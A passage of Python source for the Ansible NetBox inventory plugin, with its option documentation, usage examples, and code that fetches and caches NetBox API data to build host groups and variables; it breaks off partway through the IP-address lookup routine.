# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
name: nb_inventory
plugin_type: inventory
author:
- Remy Leone (@sieben)
- Anthony Ruhier (@Anthony25)
- Nikhil Singh Baliyan (@nikkytub)
- Sander Steffann (@steffann)
- Douglas Heriot (@DouglasHeriot)
short_description: NetBox inventory source
description:
- Get inventory hosts from NetBox
extends_documentation_fragment:
- constructed
- inventory_cache
options:
plugin:
description: token that ensures this is a source file for the 'netbox' plugin.
required: True
choices: ['netbox.netbox.nb_inventory']
api_endpoint:
description: Endpoint of the NetBox API
required: True
env:
- name: NETBOX_API
validate_certs:
description:
- Allows connection when SSL certificates are not valid. Set to C(false) when certificates are not trusted.
default: True
type: boolean
cert:
description:
- Certificate path
default: False
key:
description:
- Certificate key path
default: False
ca_path:
description:
- CA path
default: False
follow_redirects:
description:
- Determine how redirects are followed.
- By default, I(follow_redirects) is set to C(urllib2), which uses urllib2's default behavior.
default: urllib2
choices: ['urllib2', 'all', 'yes', 'safe', 'none']
config_context:
description:
- If True, it adds config_context in host vars.
- Config-context enables the association of arbitrary data to devices and virtual machines grouped by
region, site, role, platform, and/or tenant. Please check official netbox docs for more info.
default: False
type: boolean
flatten_config_context:
description:
- If I(config_context) is enabled, by default it's added as a host var named config_context.
- If flatten_config_context is set to True, the config context variables will be added directly to the host instead.
default: False
type: boolean
version_added: "0.2.1"
flatten_local_context_data:
description:
- If I(local_context_data) is enabled, by default it's added as a host var named local_context_data.
- If flatten_local_context_data is set to True, the config context variables will be added directly to the host instead.
default: False
type: boolean
version_added: "0.3.0"
flatten_custom_fields:
description:
- By default, host custom fields are added as a dictionary host var named custom_fields.
- If flatten_custom_fields is set to True, the fields will be added directly to the host instead.
default: False
type: boolean
version_added: "0.2.1"
token:
required: False
description:
- NetBox API token to be able to read against NetBox.
- This may not be required depending on the NetBox setup.
env:
# in order of precedence
- name: NETBOX_TOKEN
- name: NETBOX_API_KEY
plurals:
description:
- If True, all host vars are contained inside single-element arrays for legacy compatibility with old versions of this plugin.
- Group names will be plural (i.e. "sites_mysite" instead of "site_mysite")
- The choices of I(group_by) will be changed by this option.
default: True
type: boolean
version_added: "0.2.1"
interfaces:
description:
- If True, it adds the device or virtual machine interface information in host vars.
default: False
type: boolean
version_added: "0.1.7"
site_data:
description:
- If True, sites' full data structures returned from the NetBox API are included in host vars.
default: False
type: boolean
prefixes:
description:
- If True, it adds the device or virtual machine prefixes to hostvars nested under "site".
- Must match selection for "site_data", as this changes the structure of "site" in hostvars
default: False
type: boolean
services:
description:
- If True, it adds the device or virtual machine services information in host vars.
default: True
type: boolean
version_added: "0.2.0"
fetch_all:
description:
- By default, fetching interfaces and services will get all of the contents of NetBox regardless of query_filters applied to devices and VMs.
- When set to False, separate requests will be made fetching interfaces, services, and IP addresses for each device_id and virtual_machine_id.
- If you are using the various query_filters options to reduce the number of devices, you may find querying NetBox faster with fetch_all set to False.
- For efficiency, when False, these requests will be batched, for example /api/dcim/interfaces?limit=0&device_id=1&device_id=2&device_id=3
- These GET request URIs can become quite large for a large number of devices. If you run into HTTP 414 errors, you can adjust the max_uri_length option to suit your web server.
default: True
type: boolean
version_added: "0.2.1"
group_by:
description:
- Keys used to create groups. The I(plurals) option controls which of these are valid.
- I(rack_group) is supported on NetBox versions 2.10 or lower only
- I(location) is supported on NetBox versions 2.11 or higher only
type: list
choices:
- sites
- site
- location
- tenants
- tenant
- racks
- rack
- rack_group
- rack_role
- tags
- tag
- device_roles
- role
- device_types
- device_type
- manufacturers
- manufacturer
- platforms
- platform
- region
- cluster
- cluster_type
- cluster_group
- is_virtual
- services
- status
default: []
group_names_raw:
description: Will not add the group_by choice name to the group names
default: False
type: boolean
version_added: "0.2.0"
query_filters:
description: List of parameters passed to the query string for both devices and VMs (Multiple values may be separated by commas)
type: list
default: []
device_query_filters:
description: List of parameters passed to the query string for devices (Multiple values may be separated by commas)
type: list
default: []
vm_query_filters:
description: List of parameters passed to the query string for VMs (Multiple values may be separated by commas)
type: list
default: []
timeout:
description: Timeout for NetBox requests in seconds
type: int
default: 60
max_uri_length:
description:
- When fetch_all is False, GET requests to NetBox may become quite long and return an HTTP 414 (URI Too Long).
- You can adjust this option to be smaller to avoid 414 errors, or larger for a reduced number of requests.
type: int
default: 4000
version_added: "0.2.1"
virtual_chassis_name:
description:
- When a device is part of a virtual chassis, use the virtual chassis name as the Ansible inventory hostname.
- The host var values will be from the virtual chassis master.
type: boolean
default: False
dns_name:
description:
- Force IP Addresses to be fetched so that the dns_name for the primary_ip of each device or VM is set as a host_var.
- Setting interfaces will also fetch IP addresses and the dns_name host_var will be set.
type: boolean
default: False
ansible_host_dns_name:
description:
- If True, sets DNS Name (fetched from primary_ip) to be used in ansible_host variable, instead of IP Address.
type: boolean
default: False
compose:
description: List of custom ansible host vars to create from the device object fetched from NetBox
default: {}
type: dict
"""
EXAMPLES = """
# netbox_inventory.yml file in YAML format
# Example command line: ansible-inventory -v --list -i netbox_inventory.yml
plugin: netbox.netbox.nb_inventory
api_endpoint: http://localhost:8000
validate_certs: True
config_context: False
group_by:
- device_roles
query_filters:
- role: network-edge-router
device_query_filters:
- has_primary_ip: 'true'
# has_primary_ip is a useful way to filter out patch panels and other passive devices
# Query filters are passed directly as an argument to the fetching queries.
# You can repeat tags in the query string.
query_filters:
- role: server
- tag: web
- tag: production
# See the NetBox documentation at https://netbox.readthedocs.io/en/stable/rest-api/overview/
# the query_filters work as a logical **OR**
#
# Prefix any custom fields with cf_ and pass the field value with the regular NetBox query string
query_filters:
- cf_foo: bar
# NetBox inventory plugin also supports Constructable semantics
# You can fill your hosts vars using the compose option:
plugin: netbox.netbox.nb_inventory
compose:
foo: last_updated
bar: display_name
nested_variable: rack.display_name
# You can use keyed_groups to group on properties of devices or VMs.
# NOTE: It's only possible to key off direct items on the device/VM objects.
plugin: netbox.netbox.nb_inventory
keyed_groups:
- prefix: status
key: status.value
# For use in Ansible Tower (AWX), please see this blog from RedHat: https://www.ansible.com/blog/using-an-inventory-plugin-from-a-collection-in-ansible-tower
# The credential for NetBox will need to expose NETBOX_API and NETBOX_TOKEN as environment variables.
# Example Ansible Tower credential Input Configuration:
fields:
- id: NETBOX_API
type: string
label: NetBox Host URL
- id: NETBOX_TOKEN
type: string
label: NetBox API Token
secret: true
required:
- NETBOX_API
- NETBOX_TOKEN
# Example Ansible Tower credential Injector Configuration:
env:
NETBOX_API: '{{ NETBOX_API }}'
NETBOX_TOKEN: '{{ NETBOX_TOKEN }}'
"""
import json
import uuid
import math
import os
from copy import deepcopy
from functools import partial
from sys import version as python_version
from threading import Thread
from typing import Iterable
from itertools import chain
from collections import defaultdict
from ipaddress import ip_interface
from packaging import specifiers, version
from ansible.constants import DEFAULT_LOCAL_TMP
from ansible.plugins.inventory import BaseInventoryPlugin, Constructable, Cacheable
from ansible.module_utils.ansible_release import __version__ as ansible_version
from ansible.errors import AnsibleError
from ansible.module_utils._text import to_text, to_native
from ansible.module_utils.urls import open_url
from ansible.module_utils.six.moves.urllib import error as urllib_error
from ansible.module_utils.six.moves.urllib.parse import urlencode
class InventoryModule(BaseInventoryPlugin, Constructable, Cacheable):
NAME = "netbox.netbox.nb_inventory"
def _fetch_information(self, url):
results = None
cache_key = self.get_cache_key(url)
# get the user's cache option to see if we should save the cache if it is changing
user_cache_setting = self.get_option("cache")
# read if the user has caching enabled and the cache isn't being refreshed
attempt_to_read_cache = user_cache_setting and self.use_cache
# attempt to read the cache if inventory isn't being refreshed and the user has caching enabled
if attempt_to_read_cache:
try:
results = self._cache[cache_key]
need_to_fetch = False
except KeyError:
# occurs if the cache_key is not in the cache or if the cache_key expired
# we need to fetch the URL now
need_to_fetch = True
else:
# not reading from cache so do fetch
need_to_fetch = True
if need_to_fetch:
self.display.v("Fetching: " + url)
try:
response = open_url(
url,
headers=self.headers,
timeout=self.timeout,
validate_certs=self.validate_certs,
follow_redirects=self.follow_redirects,
client_cert=self.cert,
client_key=self.key,
ca_path=self.ca_path,
)
except urllib_error.HTTPError as e:
"""This will return the response body when we encounter an error.
This is to help determine what might be the issue when encountering an error.
Please check issue #294 for more info.
"""
# Prevent inventory from failing completely if the token does not have the proper permissions for specific URLs
if e.code == 403:
self.display.display(
"Permission denied: {0}. This may impair functionality of the inventory plugin.".format(
url
),
color="red",
)
# Need to return mock response data that is empty to prevent any failures downstream
return {"results": [], "next": None}
raise AnsibleError(to_native(e.fp.read()))
try:
raw_data = to_text(response.read(), errors="surrogate_or_strict")
except UnicodeError:
raise AnsibleError(
"Incorrect encoding of fetched payload from NetBox API."
)
try:
results = json.loads(raw_data)
except ValueError:
raise AnsibleError("Incorrect JSON payload: %s" % raw_data)
# put result in cache if enabled
if user_cache_setting:
self._cache[cache_key] = results
return results
def get_resource_list(self, api_url):
"""Retrieves resource list from netbox API.
Returns:
A list of all resource from netbox API.
"""
if not api_url:
raise AnsibleError("Please check API URL in script configuration file.")
resources = []
# Handle pagination
while api_url:
api_output = self._fetch_information(api_url)
resources.extend(api_output["results"])
api_url = api_output["next"]
return resources
def get_resource_list_chunked(self, api_url, query_key, query_values):
# Make an API call for multiple specific IDs, like /api/ipam/ip-addresses?limit=0&device_id=1&device_id=2&device_id=3
# Drastically cuts down HTTP requests compared to 1 request per host, in the case where we don't want to fetch_all
# Make sure query_values is subscriptable
if not isinstance(query_values, list):
query_values = list(query_values)
def query_string(value, separator="&"):
return separator + query_key + "=" + str(value)
# Calculate how many queries we can do per API call to stay within max_url_length
largest_value = str(max(query_values, default=0)) # values are always id ints
length_per_value = len(query_string(largest_value))
chunk_size = math.floor((self.max_uri_length - len(api_url)) / length_per_value)
# Sanity check, for case where max_uri_length < (api_url + length_per_value)
if chunk_size < 1:
chunk_size = 1
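# Illustrative sketch of the arithmetic above, with hypothetical numbers:
# if max_uri_length is 4000, api_url is 60 characters long and ids have up
# to 4 digits, each "&device_id=NNNN" fragment costs len("&device_id=") + 4
# = 15 characters, so chunk_size = floor((4000 - 60) / 15) = 262 ids per call.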
if self.api_version in specifiers.SpecifierSet("~=2.6.0"):
# Issue netbox-community/netbox#3507 was fixed in v2.7.5
# If using NetBox v2.7.0-v2.7.4 will have to manually set max_uri_length to 0,
# but it's probably faster to keep fetch_all: True
# (You should really just upgrade your NetBox install)
chunk_size = 1
resources = []
for i in range(0, len(query_values), chunk_size):
chunk = query_values[i : i + chunk_size]
# process chunk of size <= chunk_size
url = api_url
for value in chunk:
url += query_string(value, "&" if "?" in url else "?")
resources.extend(self.get_resource_list(url))
return resources
@property
def group_extractors(self):
# List of group_by options and hostvars to extract
# Some keys are different depending on plurals option
extractors = {
"disk": self.extract_disk,
"memory": self.extract_memory,
"vcpus": self.extract_vcpus,
"status": self.extract_status,
"config_context": self.extract_config_context,
"local_context_data": self.extract_local_context_data,
"custom_fields": self.extract_custom_fields,
"region": self.extract_regions,
"cluster": self.extract_cluster,
"cluster_group": self.extract_cluster_group,
"cluster_type": self.extract_cluster_type,
"is_virtual": self.extract_is_virtual,
self._pluralize_group_by("site"): self.extract_site,
self._pluralize_group_by("tenant"): self.extract_tenant,
self._pluralize_group_by("rack"): self.extract_rack,
"rack_role": self.extract_rack_role,
self._pluralize_group_by("tag"): self.extract_tags,
self._pluralize_group_by("role"): self.extract_device_role,
self._pluralize_group_by("platform"): self.extract_platform,
self._pluralize_group_by("device_type"): self.extract_device_type,
self._pluralize_group_by("manufacturer"): self.extract_manufacturer,
}
# Locations were added in 2.11 replacing rack-groups.
if self.api_version >= version.parse("2.11"):
extractors.update(
{
"location": self.extract_location,
}
)
else:
extractors.update(
{
"rack_group": self.extract_rack_group,
}
)
if self.services:
extractors.update(
{
"services": self.extract_services,
}
)
if self.interfaces:
extractors.update(
{
"interfaces": self.extract_interfaces,
}
)
if self.interfaces or self.dns_name or self.ansible_host_dns_name:
extractors.update(
{
"dns_name": self.extract_dns_name,
}
)
return extractors
def _pluralize_group_by(self, group_by):
mapping = {
"site": "sites",
"tenant": "tenants",
"rack": "racks",
"tag": "tags",
"role": "device_roles",
"platform": "platforms",
"device_type": "device_types",
"manufacturer": "manufacturers",
}
if self.plurals:
mapped = mapping.get(group_by)
return mapped or group_by
else:
return group_by
def _pluralize(self, extracted_value):
# If plurals is enabled, wrap in a single-element list for backwards compatibility
if self.plurals:
return [extracted_value]
else:
return extracted_value
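# Illustrative sketch, assuming a hypothetical site slug "mysite": with
# plurals enabled the hostvar becomes ["mysite"] under the key "sites";
# with plurals disabled it stays "mysite" under the key "site"
# (see _pluralize_group_by above for the key mapping).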
def _objects_array_following_parents(
self, initial_object_id, object_lookup, object_parent_lookup
):
objects = []
object_id = initial_object_id
# Keep looping until the object has no parent
while object_id is not None:
object_slug = object_lookup[object_id]
if object_slug in objects:
# Won't ever happen - defensively guard against infinite loop
break
objects.append(object_slug)
# Get the parent of this object
object_id = object_parent_lookup[object_id]
return objects
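# Illustrative sketch with hypothetical lookups:
# object_lookup = {1: "emea", 2: "uk", 3: "london"}
# object_parent_lookup = {1: None, 2: 1, 3: 2}
# Starting from initial_object_id=3 the walk visits london -> uk -> emea and
# returns ["london", "uk", "emea"].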
def extract_disk(self, host):
return host.get("disk")
def extract_vcpus(self, host):
return host.get("vcpus")
def extract_status(self, host):
return host["status"]
def extract_memory(self, host):
return host.get("memory")
def extract_platform(self, host):
try:
return self._pluralize(self.platforms_lookup[host["platform"]["id"]])
except Exception:
return
def extract_services(self, host):
try:
services_lookup = (
self.vm_services_lookup
if host["is_virtual"]
else self.device_services_lookup
)
return list(services_lookup[host["id"]].values())
except Exception:
return
def extract_device_type(self, host):
try:
return self._pluralize(self.device_types_lookup[host["device_type"]["id"]])
except Exception:
return
def extract_rack(self, host):
try:
return self._pluralize(self.racks_lookup[host["rack"]["id"]])
except Exception:
return
def extract_rack_group(self, host):
# A host may have a rack. A rack may have a rack_group. A rack_group may have a parent rack_group.
# Produce a list of rack_groups:
# - it will be empty if the device has no rack, or the rack has no rack_group
# - it will have 1 element if the rack's group has no parent
# - it will have multiple elements if the rack's group has a parent group
rack = host.get("rack", None)
if not isinstance(rack, dict):
# Device has no rack
return None
rack_id = rack.get("id", None)
if rack_id is None:
# Device has no rack
return None
return self._objects_array_following_parents(
initial_object_id=self.racks_group_lookup[rack_id],
object_lookup=self.rack_groups_lookup,
object_parent_lookup=self.rack_group_parent_lookup,
)
def extract_rack_role(self, host):
try:
return self.racks_role_lookup[host["rack"]["id"]]
except Exception:
return
def extract_site(self, host):
try:
site = self.sites_lookup[host["site"]["id"]]
if (
self.prefixes
): # If prefixes have been pulled, attach prefix to its assigned site
prefix_id = self.prefixes_sites_lookup[site["id"]]
prefix = self.prefixes_lookup[prefix_id]
site["prefix"] = prefix
return self._pluralize(site)
except Exception:
return
def extract_tenant(self, host):
try:
return self._pluralize(self.tenants_lookup[host["tenant"]["id"]])
except Exception:
return
def extract_device_role(self, host):
try:
if "device_role" in host:
return self._pluralize(
self.device_roles_lookup[host["device_role"]["id"]]
)
elif "role" in host:
return self._pluralize(self.device_roles_lookup[host["role"]["id"]])
except Exception:
return
def extract_config_context(self, host):
try:
if self.flatten_config_context:
# Don't wrap in an array if we're about to flatten it to separate host vars
return host["config_context"]
else:
return self._pluralize(host["config_context"])
except Exception:
return
def extract_local_context_data(self, host):
try:
if self.flatten_local_context_data:
# Don't wrap in an array if we're about to flatten it to separate host vars
return host["local_context_data"]
else:
return self._pluralize(host["local_context_data"])
except Exception:
return
def extract_manufacturer(self, host):
try:
return self._pluralize(
self.manufacturers_lookup[host["device_type"]["manufacturer"]["id"]]
)
except Exception:
return
def extract_primary_ip(self, host):
try:
address = host["primary_ip"]["address"]
return str(ip_interface(address).ip)
except Exception:
return
def extract_primary_ip4(self, host):
try:
address = host["primary_ip4"]["address"]
return str(ip_interface(address).ip)
except Exception:
return
def extract_primary_ip6(self, host):
try:
address = host["primary_ip6"]["address"]
return str(ip_interface(address).ip)
except Exception:
return
def extract_tags(self, host):
try:
tag_zero = host["tags"][0]
# Check the type of the first element in the "tags" array.
# If a dictionary (NetBox >= 2.9), return an array of tags' slugs.
if isinstance(tag_zero, dict):
return list(sub["slug"] for sub in host["tags"])
# If a string (NetBox <= 2.8), return the original "tags" array.
elif isinstance(tag_zero, str):
return host["tags"]
# If tag_zero fails definition (no tags), return the empty array.
except Exception:
return host["tags"]
def extract_interfaces(self, host):
try:
interfaces_lookup = (
self.vm_interfaces_lookup
if host["is_virtual"]
else self.device_interfaces_lookup
)
interfaces = deepcopy(list(interfaces_lookup[host["id"]].values()))
before_netbox_v29 = bool(self.ipaddresses_intf_lookup)
# Attach IP Addresses to their interface
for interface in interfaces:
if before_netbox_v29:
interface["ip_addresses"] = list(
self.ipaddresses_intf_lookup[interface["id"]].values()
)
else:
interface["ip_addresses"] = list(
self.vm_ipaddresses_intf_lookup[interface["id"]].values()
if host["is_virtual"]
else self.device_ipaddresses_intf_lookup[
interface["id"]
].values()
)
interface["tags"] = list(sub["slug"] for sub in interface["tags"])
return interfaces
except Exception:
return
def extract_custom_fields(self, host):
try:
return host["custom_fields"]
except Exception:
return
def extract_regions(self, host):
# A host may have a site. A site may have a region. A region may have a parent region.
# Produce a list of regions:
# - it will be empty if the device has no site, or the site has no region set
# - it will have 1 element if the site's region has no parent
# - it will have multiple elements if the site's region has a parent region
site = host.get("site", None)
if not isinstance(site, dict):
# Device has no site
return []
site_id = site.get("id", None)
if site_id is None:
# Device has no site
return []
return self._objects_array_following_parents(
initial_object_id=self.sites_region_lookup[site_id],
object_lookup=self.regions_lookup,
object_parent_lookup=self.regions_parent_lookup,
)
def extract_location(self, host):
# A host may have a location. A location may have a parent location.
# Produce a list of locations:
# - it will be empty if the device has no location
# - it will have 1 element if the device's location has no parent
# - it will have multiple elements if the location has a parent location
try:
location_id = host["location"]["id"]
except (KeyError, TypeError):
# Device has no location
return []
return self._objects_array_following_parents(
initial_object_id=location_id,
object_lookup=self.locations_lookup,
object_parent_lookup=self.locations_parent_lookup,
)
def extract_cluster(self, host):
try:
# cluster does not have a slug
return host["cluster"]["name"]
except Exception:
return
def extract_cluster_group(self, host):
try:
return self.clusters_group_lookup[host["cluster"]["id"]]
except Exception:
return
def extract_cluster_type(self, host):
try:
return self.clusters_type_lookup[host["cluster"]["id"]]
except Exception:
return
def extract_is_virtual(self, host):
return host.get("is_virtual")
def extract_dns_name(self, host):
# No primary IP assigned
if not host.get("primary_ip"):
return None
before_netbox_v29 = bool(self.ipaddresses_lookup)
if before_netbox_v29:
ip_address = self.ipaddresses_lookup.get(host["primary_ip"]["id"])
else:
if host["is_virtual"]:
ip_address = self.vm_ipaddresses_lookup.get(host["primary_ip"]["id"])
else:
ip_address = self.device_ipaddresses_lookup.get(
host["primary_ip"]["id"]
)
# Don"t assign a host_var for empty dns_name
if ip_address.get("dns_name") == "":
return None
return ip_address.get("dns_name")
def refresh_platforms_lookup(self):
url = self.api_endpoint + "/api/dcim/platforms/?limit=0"
platforms = self.get_resource_list(api_url=url)
self.platforms_lookup = dict(
(platform["id"], platform["slug"]) for platform in platforms
)
def refresh_sites_lookup(self):
# Three dictionaries are created here.
# "sites_lookup_slug" only contains the slug. Used by _add_site_groups() when creating inventory groups
# "sites_lookup" contains the full data structure. Most site lookups use this
# "sites_with_prefixes" keeps track of which sites have prefixes assigned. Passed to get_resource_list_chunked()
url = self.api_endpoint + "/api/dcim/sites/?limit=0"
sites = self.get_resource_list(api_url=url)
# The following dictionary is used for host group creation only,
# as the grouping function expects a string as the value of each key
self.sites_lookup_slug = dict((site["id"], site["slug"]) for site in sites)
if self.site_data or self.prefixes:
# If the "site_data" option is specified, keep the full data structure presented by the API response.
# The "prefixes" option necessitates this structure as well as it requires the site object to be dict().
self.sites_lookup = dict((site["id"], site) for site in sites)
else:
# Otherwise, set equal to the "slug only" dictionary
self.sites_lookup = self.sites_lookup_slug
# The following dictionary tracks which sites have prefixes assigned.
self.sites_with_prefixes = set()
for site in sites:
if site["prefix_count"] > 0:
self.sites_with_prefixes.add(site["slug"])
# Used by refresh_prefixes()
def get_region_for_site(site):
# Will fail if site does not have a region defined in NetBox
try:
return (site["id"], site["region"]["id"])
except Exception:
return (site["id"], None)
# Dictionary of site id to region id
self.sites_region_lookup = dict(map(get_region_for_site, sites))
# Note: depends on the result of refresh_sites_lookup for self.sites_with_prefixes
def refresh_prefixes(self):
# Pull all prefixes defined in NetBox
url = self.api_endpoint + "/api/ipam/prefixes"
if self.fetch_all:
prefixes = self.get_resource_list(url)
else:
prefixes = self.get_resource_list_chunked(
api_url=url,
query_key="site",
query_values=list(self.sites_with_prefixes),
)
self.prefixes_sites_lookup = defaultdict(dict)
self.prefixes_lookup = defaultdict(dict)
# We are only concerned with Prefixes that have actually been assigned to sites
for prefix in prefixes:
if prefix.get("site"):
prefix_id = prefix["id"]
site_id = prefix["site"]["id"]
self.prefixes_lookup[prefix_id] = prefix
self.prefixes_sites_lookup[site_id] = prefix_id
# Remove "site" attribute, as it's redundant when prefixes are assigned to site
del prefix["site"]
def refresh_regions_lookup(self):
url = self.api_endpoint + "/api/dcim/regions/?limit=0"
regions = self.get_resource_list(api_url=url)
self.regions_lookup = dict((region["id"], region["slug"]) for region in regions)
def get_region_parent(region):
# Will fail if region does not have a parent region
try:
return (region["id"], region["parent"]["id"])
except Exception:
return (region["id"], None)
# Dictionary of region id to parent region id
self.regions_parent_lookup = dict(
filter(lambda x: x is not None, map(get_region_parent, regions))
)
def refresh_locations_lookup(self):
# Locations were added in v2.11. Return empty lookups for previous versions.
if self.api_version < version.parse("2.11"):
return
url = self.api_endpoint + "/api/dcim/locations/?limit=0"
locations = self.get_resource_list(api_url=url)
self.locations_lookup = dict(
(location["id"], location["slug"]) for location in locations
)
def get_location_parent(location):
# Will fail if location does not have a parent location
try:
return (location["id"], location["parent"]["id"])
except Exception:
return (location["id"], None)
def get_location_site(location):
# Locations MUST be assigned to a site
return (location["id"], location["site"]["id"])
# Dictionary of location id to parent location id
self.locations_parent_lookup = dict(
filter(None, map(get_location_parent, locations))
)
# Location to site lookup
self.locations_site_lookup = dict(map(get_location_site, locations))
def refresh_tenants_lookup(self):
url = self.api_endpoint + "/api/tenancy/tenants/?limit=0"
tenants = self.get_resource_list(api_url=url)
self.tenants_lookup = dict((tenant["id"], tenant["slug"]) for tenant in tenants)
def refresh_racks_lookup(self):
url = self.api_endpoint + "/api/dcim/racks/?limit=0"
racks = self.get_resource_list(api_url=url)
self.racks_lookup = dict((rack["id"], rack["name"]) for rack in racks)
def get_group_for_rack(rack):
try:
return (rack["id"], rack["group"]["id"])
except Exception:
return (rack["id"], None)
def get_role_for_rack(rack):
try:
return (rack["id"], rack["role"]["slug"])
except Exception:
return (rack["id"], None)
self.racks_group_lookup = dict(map(get_group_for_rack, racks))
self.racks_role_lookup = dict(map(get_role_for_rack, racks))
def refresh_rack_groups_lookup(self):
# Locations were added in v2.11 replacing rack groups. Do nothing for 2.11+
if self.api_version >= version.parse("2.11"):
return
url = self.api_endpoint + "/api/dcim/rack-groups/?limit=0"
rack_groups = self.get_resource_list(api_url=url)
self.rack_groups_lookup = dict(
(rack_group["id"], rack_group["slug"]) for rack_group in rack_groups
)
def get_rack_group_parent(rack_group):
try:
return (rack_group["id"], rack_group["parent"]["id"])
except Exception:
return (rack_group["id"], None)
# Dictionary of rack group id to parent rack group id
self.rack_group_parent_lookup = dict(map(get_rack_group_parent, rack_groups))
def refresh_device_roles_lookup(self):
url = self.api_endpoint + "/api/dcim/device-roles/?limit=0"
device_roles = self.get_resource_list(api_url=url)
self.device_roles_lookup = dict(
(device_role["id"], device_role["slug"]) for device_role in device_roles
)
def refresh_device_types_lookup(self):
url = self.api_endpoint + "/api/dcim/device-types/?limit=0"
device_types = self.get_resource_list(api_url=url)
self.device_types_lookup = dict(
(device_type["id"], device_type["slug"]) for device_type in device_types
)
def refresh_manufacturers_lookup(self):
url = self.api_endpoint + "/api/dcim/manufacturers/?limit=0"
manufacturers = self.get_resource_list(api_url=url)
self.manufacturers_lookup = dict(
(manufacturer["id"], manufacturer["slug"]) for manufacturer in manufacturers
)
def refresh_clusters_lookup(self):
url = self.api_endpoint + "/api/virtualization/clusters/?limit=0"
clusters = self.get_resource_list(api_url=url)
def get_cluster_type(cluster):
# Will fail if cluster does not have a type (required property so should always be true)
try:
return (cluster["id"], cluster["type"]["slug"])
except Exception:
return (cluster["id"], None)
def get_cluster_group(cluster):
# Will fail if cluster does not have a group (group is optional)
try:
return (cluster["id"], cluster["group"]["slug"])
except Exception:
return (cluster["id"], None)
self.clusters_type_lookup = dict(map(get_cluster_type, clusters))
self.clusters_group_lookup = dict(map(get_cluster_group, clusters))
def refresh_services(self):
url = self.api_endpoint + "/api/ipam/services/?limit=0"
services = []
if self.fetch_all:
services = self.get_resource_list(url)
else:
device_services = self.get_resource_list_chunked(
api_url=url,
query_key="device_id",
query_values=self.devices_lookup.keys(),
)
vm_services = self.get_resource_list_chunked(
api_url=url,
query_key="virtual_machine_id",
query_values=self.vms_lookup.keys(),
)
services = chain(device_services, vm_services)
# Construct a dictionary of dictionaries, separately for devices and vms.
# Allows looking up services by device id or vm id
self.device_services_lookup = defaultdict(dict)
self.vm_services_lookup = defaultdict(dict)
for service in services:
service_id = service["id"]
if service.get("device"):
self.device_services_lookup[service["device"]["id"]][
service_id
] = service
if service.get("virtual_machine"):
self.vm_services_lookup[service["virtual_machine"]["id"]][
service_id
] = service
def refresh_interfaces(self):
url_device_interfaces = self.api_endpoint + "/api/dcim/interfaces/?limit=0"
url_vm_interfaces = (
self.api_endpoint + "/api/virtualization/interfaces/?limit=0"
)
device_interfaces = []
vm_interfaces = []
if self.fetch_all:
device_interfaces = self.get_resource_list(url_device_interfaces)
vm_interfaces = self.get_resource_list(url_vm_interfaces)
else:
device_interfaces = self.get_resource_list_chunked(
api_url=url_device_interfaces,
query_key="device_id",
query_values=self.devices_lookup.keys(),
)
vm_interfaces = self.get_resource_list_chunked(
api_url=url_vm_interfaces,
query_key="virtual_machine_id",
query_values=self.vms_lookup.keys(),
)
# Construct a dictionary of dictionaries, separately for devices and vms.
# For a given device id or vm id, get a lookup of interface id to interface
# This is because interfaces may be returned multiple times when querying for virtual chassis parent and child in separate queries
self.device_interfaces_lookup = defaultdict(dict)
self.vm_interfaces_lookup = defaultdict(dict)
# /dcim/interfaces gives count_ipaddresses per interface. /virtualization/interfaces does not
self.devices_with_ips = set()
for interface in device_interfaces:
interface_id = interface["id"]
device_id = interface["device"]["id"]
# Check if device_id is actually a device we've fetched, and was not filtered out by query_filters
if device_id not in self.devices_lookup:
continue
# Check if device_id is part of a virtual chassis
# If so, treat its interfaces as actually part of the master
device = self.devices_lookup[device_id]
virtual_chassis_master = self._get_host_virtual_chassis_master(device)
if virtual_chassis_master is not None:
device_id = virtual_chassis_master
self.device_interfaces_lookup[device_id][interface_id] = interface
# Keep track of what devices have interfaces with IPs, so if fetch_all is False we can avoid unnecessary queries
if interface["count_ipaddresses"] > 0:
self.devices_with_ips.add(device_id)
for interface in vm_interfaces:
interface_id = interface["id"]
vm_id = interface["virtual_machine"]["id"]
self.vm_interfaces_lookup[vm_id][interface_id] = interface
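# Illustrative sketch of the resulting structure, with hypothetical ids:
# self.device_interfaces_lookup == {12: {101: {...eth0...}, 102: {...eth1...}}}
# i.e. device id -> {interface id -> interface dict}; interfaces of virtual
# chassis members are re-keyed under the chassis master's device id.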
# Note: depends on the result of refresh_interfaces for self.devices_with_ips
def refresh_ipaddresses(self):
url = (
self.api_endpoint
+ "/api/ipam/ip-addresses/?limit=0&assigned_to_interface=true"
)
ipaddresses = []
if self.fetch_all:
ipaddresses = self.get_resource_list(url)
else:
device_ips = self.get_resource_list_chunked(
api_url=url,
query_key="device_id",
query_values=list(self.devices_with_ips),
)
vm_ips = self.get_resource_list_chunked(
api_url=url,
query_key="virtual_machine_id",
query_values=self.vms_lookup.keys(),
)
ipaddresses = chain(device_ips, vm_ips)
# Construct a dictionary of lists, to allow looking up ip addresses by interface id
# Note that interface ids share the same namespace for both devices and vms so this is a single dictionary
self.ipaddresses_intf_lookup = defaultdict(dict)
# Construct a dictionary of the IP addresses themselves
self.ipaddresses_lookup = defaultdict(dict)
# NetBox v2.9 and onwards
self.vm_ipaddresses_intf_lookup = defaultdict(dict)
self.vm_ipaddresses_lookup = defaultdict(dict)
self.device_ipaddresses_intf_lookup = defaultdict(dict)
self.device_ipaddresses_lookup = defaultdict(dict)
for ipaddress in ipaddresses:
# As of NetBox v2.9 "assigned_object_x" replaces "interface"
if ipaddress.get("assigned_object_id"):
interface_id = ipaddress["assigned_object_id"]
ip_id = ipaddress["id"]
# We need to copy the ipaddress entry to preserve the original in case caching is used.
ipaddress_copy = ipaddress.copy()
if ipaddress["assigned_object_type"] == "virtualization.vminterface":
self.vm_ipaddresses_lookup[ip_id] = ipaddress_copy
self.vm_ipaddresses_intf_lookup[interface_id][
ip_id
] = ipaddress_copy
else:
self.device_ipaddresses_lookup[ip_id] = ipaddress_copy
self.device_ipaddresses_intf_lookup[interface_id][
ip_id
] = ipaddress_copy
# Remove "assigned_object_X" attributes, as that's redundant when ipaddress is added to an interface
del ipaddress_copy["assigned_object_id"]
del ipaddress_copy["assigned_object_type"]
del ipaddress_copy["assigned_object"]
continue
if not ipaddress.get("interface"):
continue
interface_id = ipaddress["interface"]["id"]
ip_id = ipaddress["id"]
# We need to copy the ipaddress entry to preserve the original in case caching is used.
ipaddress_copy = ipaddress.copy()
self.ipaddresses_intf_lookup[interface_id][ip_id] = ipaddress_copy
self.ipaddresses_lookup[ip_id] = ipaddress_copy
# Remove "interface" attribute, as that's redundant when ipaddress is added to an interface
